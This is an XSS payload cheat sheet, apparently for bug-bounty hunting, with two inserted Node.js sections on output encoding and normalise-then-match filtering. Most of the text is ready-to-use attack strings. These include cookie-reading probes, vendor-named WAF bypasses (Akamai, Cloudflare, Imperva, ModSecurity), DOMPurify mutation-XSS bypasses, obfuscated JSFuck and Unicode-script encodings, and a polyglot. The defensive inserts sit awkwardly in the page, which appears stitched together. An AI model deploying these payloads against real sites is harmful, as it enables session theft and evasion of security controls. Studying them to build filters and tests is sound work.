XSS PAYLOADS

🔹Single Reflection Using QUERY of URL🔹

  01 - HTML Injection (a)
  02 - HTML Injection Inline with Double Quotes (b1)
  03 - HTML Injection Inline with Single Quotes (b2)
  04 - HTML Injection Inline with Double Quotes: No Tag Breaking (b3)
  05 - HTML Injection Inline with Single Quotes: No Tag Breaking (b4)
  06 - HTML Injection with Single Quotes in JS Block (c1)
  07 - HTML Injection with Double Quotes in JS Block (c2)
  08 - JS Injection with Single Quotes (c3)
  09 - JS Injection with Double Quotes (c4)
  10 - Escaped JS Injection with Single Quotes (c5)
  11 - Escaped JS Injection with Double Quotes (c6)
  12 - JS Injection In Event Handler (No Handler Breaking)
  13 - JS Injection in Fully Validated Anchor (Href)
  14 - XML Injection with CDATA and Comment Breakout (p, q & r)

🔹Single Reflection Using PATH of URL ("friendly URLs")🔹

  01 - HTML Injection Inline PHP_SELF
  02 - HTML Injection 1 Level Deep
  03 - HTML Injection 2 Levels Deep
  04 - HTML Injection 3 Levels Deep
  05 - HTML Injection in Script Block 1 Level Deep
  06 - HTML Injection in Script Block 2 Levels Deep
  07 - HTML Injection in Script Block 3 Levels Deep
  08 - JS Injection in Script Block 1 Level Deep
  09 - JS Injection in Script Block 2 Levels Deep
  10 - JS Injection in Script Block 3 Levels Deep

🔹Multi Reflection🔹

  01 - Double Injection in HTML Context with Double Quotes
  02 - Double Injection in Mixed Context (HTML + JS) with Default Quotes
  03 - Quoteless Inline Double Injection in JS variables
  04 - Quoteless Inline Double Injection in JS object
  05 - Quoteless Inline Double Injection in JS object with Nested Array
  06 - Quoteless Inline Double Injection in JS object with Nested Function

🔹Special Cases🔹

  01 - HTML Injection with Double Encoded Bypass
  02 - HTML Injection with SQLi Error-Based *
  03 - HTML Injection with PHP FILTER_VALIDATE_EMAIL Bypass
  04 - HTML Injection with Strict-Length Input (32, 40 and 64 chars)
  05 - HTML Injection with Strip-based Bypass (AFB)
  06 - HTML Injection with Spell Checking Bypass
  07 - HTML Injection with Base64 Encoded Input
  08 - HTML Injection with Parameter Guessing
  09 - HTML Injection in Parameter Name
  10 - JS Injection with Single Quotes Fixing ReferenceError (also with Double Quotes and Escaped variations)
  11 - Multi Context Injection with Bypass on Alpha-based Filter and JSON Encode Function (2 Different Entry Points)
  12 - HTML Injection with CRLF in HTTP Header (Content-Type Replacement)

🔹DOM XSS🔹

  01 - DOM Injection via URL Parameter (by server + client)
  02 - DOM Injection via URL Parameter (Document Sink)
  03 - DOM Injection via Open Redirection (Location Sink)
  04 - DOM Injection via URL Parameter (Execution Sink)
  05 - DOM Injection via AJAX in URL Fragment (Document Sink)
  06 - DOM Injection via AngularJS Library versions 1.6.0+
  07 - DOM Injection via Bootstrap Library versions 4.0.0, 4.1.0 and 4.1.1
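The index above is organised by reflection context (HTML body, quoted attribute, JS string block, anchor href), and the fix is organised the same way: one encoder per context, chosen by where the value lands. The following is an added example (not code from the original cheat sheet or from the lab it indexes) in Node.js with no dependencies; `renderPage()` is a hypothetical template that shows each encoder in its context.

```javascript
// Context-aware output encoding for the reflection contexts in the index.
// Added example, not part of the original page. Node.js, no dependencies.

// (a) HTML body context: entity-encode the characters that can open a tag
//     or attribute. '/' is included for templates that omit attribute quotes.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, c => map[c]);
}

// (b1..b4) Inside a quoted HTML attribute: encode everything that is not
//     alphanumeric as &#xHH;, so neither quote style can be broken out of and
//     an injected "onfocus=" stays literal text inside the attribute value.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => `&#x${c.charCodeAt(0).toString(16)};`);
}

// (c1..c6) Inside a JS string literal in a <script> block: \xHH / \uHHHH
//     encode everything non-alphanumeric. Backslash-escaping the quote alone
//     is what the "Escaped JS Injection" entries defeat; hex encoding also
//     guarantees that "</script>" cannot survive inside the literal.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 256
      ? `\\x${code.toString(16).padStart(2, '0')}`
      : `\\u${code.toString(16).padStart(4, '0')}`;
  });
}

// (13) href / src: encoding is not enough, the scheme must be allow-listed.
//     The check runs on a copy with control characters and whitespace removed,
//     which is what the browser's URL parser does, so "jav\tascript:" is
//     judged as "javascript:" and rejected.
function safeUrl(s) {
  const cleaned = String(s).replace(/[\u0000-\u0020\u007f]/g, '');
  return /^https?:\/\//i.test(cleaned) ? encodeForHtmlAttribute(s) : '#';
}

// Hypothetical page template: the same user value reflected in four contexts,
// each through the encoder for that context.
function renderPage(userInput) {
  return [
    `<p>${encodeForHtml(userInput)}</p>`,
    `<input value="${encodeForHtmlAttribute(userInput)}">`,
    `<script>var q='${encodeForJsString(userInput)}';</script>`,
    `<a href="${safeUrl(userInput)}">link</a>`,
  ].join('\n');
}

module.exports = { encodeForHtml, encodeForHtmlAttribute, encodeForJsString, safeUrl, renderPage };
```

The attribute and JS-string encoders are deliberately aggressive (everything non-alphanumeric): a denylist of the five HTML characters is enough for the body context, but in attribute and script contexts the break-out characters depend on the surrounding quotes, so encoding by allow-list removes that dependency.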

🔹ALWAYS ALERT🔹

Check whether your XSS fires on a critical in-scope domain, and not inside a sandboxed iframe or on a sandbox domain.

alert(document.domain)
alert(window.origin)

window.alert(1)
window.document.cookie.alert(1) 
window.localStorage(1)

Try it on:

  • URL query, fragment & path;

  • all input fields.

//ALERT: COOKIE

with(document)alert(cookie)

//ALERT: document.domain

prompt`${document.domain}`

🔹XSS Without parentheses ()🔹

This repo contains XSS payloads that don't require parentheses.

🔹BYPASS: WAF🔹

//AWS

<script>eval(atob(decodeURIComponent(confirm`1`)))</script>

//Akamai => tough but flawed

https://www.akamai.com/pt?x55=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22

https://brutelogic.com.br/gym.php?p08=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22
"AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/"

//CloudFlare => child's play

#.hta%253ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>

#../index.php/%2522%253E%253Ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>/
                                          
“>-setTimeout`\u0028alert(document.domain)\u0029`-’

'-setTimeout`prompt\u0028document.domain\u0029`-'


"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">


GET /search.html?ey272ayolocation.search=&q="><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

"><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<svg%0Aonauxclick=0;[1].some(confirm)//

<svg/onload={alert`1`}>

<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

"><onx=[] onmouseover=prompt(1)>

%2sscript%2ualert()%2s/script%2u

"Onx=() onMouSeoVer=prompt(1)>
"Onx=[] onMouSeoVer=prompt(1)>
"/*/Onx=""//onfocus=prompt(1)>
"//Onx=""/*/%01onfocus=prompt(1)>
"%01onClick=prompt(1)>
"%2501onclick=prompt(1)>
"onClick="(prompt)(1)
"Onclick="(prompt(1))
"OnCliCk="(prompt`1`)
"Onclick="([1].map(confirm))

[1].map(confirm)
'ale'+'rt'()
a&Tab;l&Tab;e&Tab;r&Tab;t(1)
prompt&lpar;1&rpar;
prompt&#40;1&#41;
prompt%26%2300000000000000000040;1%26%2300000000000000000041;
(prompt())
(prompt``)

<svg onload=alert%26%230000000040"1")>

<svg onload=prompt%26%230000000040document.domain)>

<svg onload=prompt%26%23x000000028;document.domain)>

<svg/onrandom=random onload=confirm(1)>

<video onnull=null onmouseover=confirm(1)>

<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

<--`<img/src=` onerror=confirm``> --!>

<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">

<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x

'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

'"><img/src/onerror=.1|alert``>

:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();

//DOMPurify

delete DOMPurify.isSupported

delete document.implementation.__proto__.createHTMLDocument

//DOMPurify < 2.1

<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

<math><mtext><table><mglyph><style><![CDATA[</style><img title="]]&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

<math><mtext><table><mglyph><style><!--</style><img title=&quot;--></mglyph><img	src=1	onerror=alert(1)>">

//DOMPurify < 2.0.1

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>

//Cloudfront

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>

<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>

"><--<img+src= "><svg/onload+alert(document.domain)>> --!>

//Cloudbric

<a69/onclick=[1].findIndex(alert)>pew

//Comodo WAF

<input/oninput='new Function`confir\u006d\`0\``'>

<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme

//ModSecurity

<a href="jav%0Dascript&colon;alert(1)">

//Imperva=> always naive

<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>

<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

<a69/onclick=write&lpar;&rpar;>pew

<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>

<svg onload\r\n=$.globalEval("al"+"ert()");>

<svg/onload=self[`aler`%2b`t`]`1`>

%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<img/src=q onerror='new Function`al\ert\`1\``'>

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
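Most of the WAF bypasses listed above do not change what the browser executes; they change what an inspection engine sees before it decodes. `&Tab;`, `&lpar;`, `&colon;`, numeric references padded with leading zeros (`&#0000000040;`), double URL encoding (`%2526%2523x28%3B`), `\u0070` inside an identifier, and a CR or tab inside `javascript:` are all resolved by the HTML parser, the URL parser or the JS engine, so a rule that matches on the raw request misses them. The defensive counterpart is to normalise through the same layers before matching. The following is an added example (not code from the original page, and not any vendor's WAF logic) in Node.js with no dependencies; the rule set is a deliberately small, hypothetical one, and the sample inputs are copied from the lists above plus one constructed benign line.

```javascript
// Normalise-then-match: decode the layers a browser decodes before applying
// detection rules. Added example, not part of the original page.

const NAMED = { Tab: '\t', NewLine: '\n', colon: ':', lpar: '(', rpar: ')',
                lsqb: '[', rsqb: ']', quot: '"', apos: "'", lt: '<', gt: '>', amp: '&' };

// HTML character references, including numeric ones padded with leading zeros.
function decodeEntities(s) {
  const fromCode = (m, n) => (n <= 0x10ffff ? String.fromCodePoint(n) : m);
  return s
    .replace(/&#x0*([0-9a-f]+);?/gi, (m, h) => fromCode(m, parseInt(h, 16)))
    .replace(/&#0*(\d+);?/g, (m, d) => fromCode(m, parseInt(d, 10)))
    .replace(/&([A-Za-z]+);/g, (m, n) => (n in NAMED ? NAMED[n] : m));
}

// Bounded repeated URL decoding: %2528 -> %28 -> "(". Stops on malformed input.
function urlDecodeAll(s, rounds = 3) {
  for (let i = 0; i < rounds; i++) {
    let next;
    try { next = decodeURIComponent(s); } catch { break; }
    if (next === s) break;
    s = next;
  }
  return s;
}

// Full pipeline: URL -> entities -> URL again (entities can hide '%') -> JS escapes.
function normalize(input) {
  let s = urlDecodeAll(String(input));
  s = decodeEntities(s);
  s = urlDecodeAll(s);
  s = s.replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
       .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  return s.toLowerCase();
}

// Two views of the normalised text: whitespace collapsed (keeps HTML token
// boundaries) and whitespace stripped (what the URL parser sees in href=).
function views(input) {
  const n = normalize(input);
  return [
    n.replace(/[\u0000-\u0020\u007f]+/g, ' '),
    n.replace(/[\u0000-\u0020\u007f]/g, ''),
  ];
}

// Hypothetical, intentionally small rule set.
const RULES = [
  /\bon[a-z]+\s*=/,                        // event handler attribute
  /\b(alert|prompt|confirm|eval)\s*[(`]/,  // common sink calls, incl. tagged templates
  /javascript\s*:/,                        // javascript: scheme
];

// Same rules on the raw request: what a filter without normalisation sees.
function naiveMatch(input) {
  const s = String(input).toLowerCase();
  return RULES.some(r => r.test(s));
}

function normalizedMatch(input) {
  return views(input).some(v => RULES.some(r => r.test(v)));
}

// Inputs: three payload forms from the lists above, one constructed benign line.
const SAMPLES = [
  '"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;',
  '<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>',
  '%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E',
  "Call me tomorrow at (555) 0100, I'll be online & around",
];

function triage(samples = SAMPLES) {
  return samples.map(s => ({ naive: naiveMatch(s), normalized: normalizedMatch(s) }));
}

module.exports = { decodeEntities, urlDecodeAll, normalize, views, naiveMatch, normalizedMatch, triage, SAMPLES };
```

Running `triage()` shows the three payload samples failing the naive rules and passing the normalised ones, while the benign line passes neither. The bounded decode loop matters: an unbounded one is a denial-of-service vector on its own, and decoding more rounds than the receiving parser does produces false positives on legitimately double-encoded data.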

//Sucuri=> narrow ways

//

BYPASS: 302

ws://google.com"><svg/onload=alert(2)>
wss://google.com"><svg/onload=alert(2)>
resource://google.com"><svg/onload=alert(2)>

BYPASS: 403 (Forbidden)

Reflected XSS on ???? via ?? parameter: 404 Not Found hides something

  1. Found a subdomain returning 404.

  2. Brute-forced it with FFUF and found a 200 OK endpoint.

  3. Did parameter fuzzing with Arjun.

  4. That parameter was vulnerable to XSS.

BYPASS: 429 (Too Many Requests)

BYPASS: Captcha (Google reCAPTCHA)

BYPASS: Two-Factor Authentication

🔹ENCODE PAYLOAD🔹

TRANSLATE JAVASCRIPT TO OTHER WRITING SYSTEMS.

//Encode: jsfuck

https://jsfuck.com/
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}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}$```//Function(alert(1))

//Encode: aurebesh

https://aem1k.com/aurebesh.js/#

//Encode: Katakana

https://www.sljfaq.org/cgi/e2k.cgi
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()

//Encode: Lontara

https://lingojam.com/Lontara
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()

//Encode: Cuneiform

https://funtranslations.com/babylonian
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

Polyglot XSS

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
